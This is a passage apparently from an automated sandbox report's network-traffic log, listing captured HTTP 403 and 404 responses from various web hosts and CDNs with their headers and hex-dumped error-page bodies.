29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Thu, 27 Jul 2023 19:54:19 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceSet-Cookie: crumb=BZ5bS5AoJ0RXYzViZmJjZTc5NGQ0Mjg4Yjk4MTk4MmUwMTMyNTU4;Path=/X-Contextid: ikjxZlua/thqWN2nTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:54:20 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 246X-Sorting-Hat-ShopId: 9394790Server-Timing: processing;dur=19X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: d26fdc7d-d1db-4b63-8a39-c56e9a3a2c3aCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DrCNDr8DuGPwLM01PwVsK0RHDn9v7Q477nw5bZeCi%2FfOrN%2BeEhdqFOpPJQ1kH0c5JCWwLznPHIPgRN8nyGoiumYffyXmxx2Hgp10Mop3wGrgiYcb8IrBb36T8pbJ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=154.000044Server: cloudflareCF-RAY: 7ed76f033aa29c0d-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Thu, 27 Jul 2023 19:54:21 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15003X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 63 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cacheX-Turbo-Charged-By: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tWSsLV691zcaMM3%2FGVhn%2FmwYsuBlGNAuNBRjlfoF15mrzL5jwSYJVmxKmpbS57Pp6w%2B5hyoVEpEAMrJgxDOd2td5PP9JE40pkkTHJVABAWCT0tUw6bEx0UWhT%2FxJ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed76f24e803bb59-FRAalt-svc: h3=":443"; ma=86400Data Raw: 32 62 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 33 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b Data Ascii: 2bb<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="mar
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:54:26 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 246X-Sorting-Hat-ShopId: 9394790Server-Timing: processing;dur=14X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 4da1aac1-c1a0-4667-8565-a050a97a3839CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sBkELRE4YizPYZFoVjVZZT%2FCwEruNqbR7Puif9ScaoqrmJhx3bIyQX4HcYqhA4qIdfOoKyOoIRdq1%2FKMXuiNFQvTAqhU8NAI0HuoEJhuHzQuJFm3y92GjQQFv1H1"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=154.000044Server: cloudflareCF-RAY: 7ed76f2c382a190f-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:28 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:29 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:54:29 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 246X-Sorting-Hat-ShopId: 9394790Server-Timing: processing;dur=14X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 1ca50d47-5885-4ce2-bdc8-a19d08f37e25CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=939A0Dn1emB7lSIlN5E0mrogvzIzsRPKxp4eSXtX%2FnWa1of4StiRBIqqNBOmwXzk2WDJW0wlgJvaCoLCEjBvSiojIoGIhTmewdYaAEQI%2F62OLJpl6suJustv9%2FfI"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=144.000053Server: cloudflareCF-RAY: 7ed76f3b7f169b71-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:29 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=D7PgQqVFIWtGbjo%2Fp8lZjCYNvSzy26jf3TE7oNWQLHxYkQT6qJqjPE4HD352xZG4sqU2pussvMMUBfz%2BNjGl1WToQaBO3dJRKQn%2FEza1CublAGHyaDEf11ucZzo9Fhs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed76f4028762c72-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:29 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zzYUUMWKaJHcLsDUau5L%2FqBIg3yyTkeFSh4NK53T9f5vygdxWzJG9Rf%2F4dyEwfUqfs%2FCDu8fg%2FCohtIog6GWFB1q%2FrOM8bjYYAsjaqedIJS3c8%2FsJh4GnxGcKqKSbf8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed76f40589d2c72-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:31 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveX-Seen-By: RQvnDyN5n1orR2cJk2hJbg==,m0j2EEknGIVUW/liY8BLLphidMtWzh3rsfhiQCDTS12PfR5Gq0aOvPi6ADB6Ij8QX-Wix-Request-Id: 1690487671.471643408520117462X-Content-Type-Options: nosniffData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:31 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rUyJjpb3FRHH55JH2b%2FALTarlcrPYThIKYHcVjhnFptCo68RPDxch1mxbPoR7in0yOdUFf2Yp5zOonCqKHi2f1bXqEUExHfj5nfbeV%2FEeRpv2QaOwUGDFYdZQu8zdAXG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed76f4acc8618f5-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
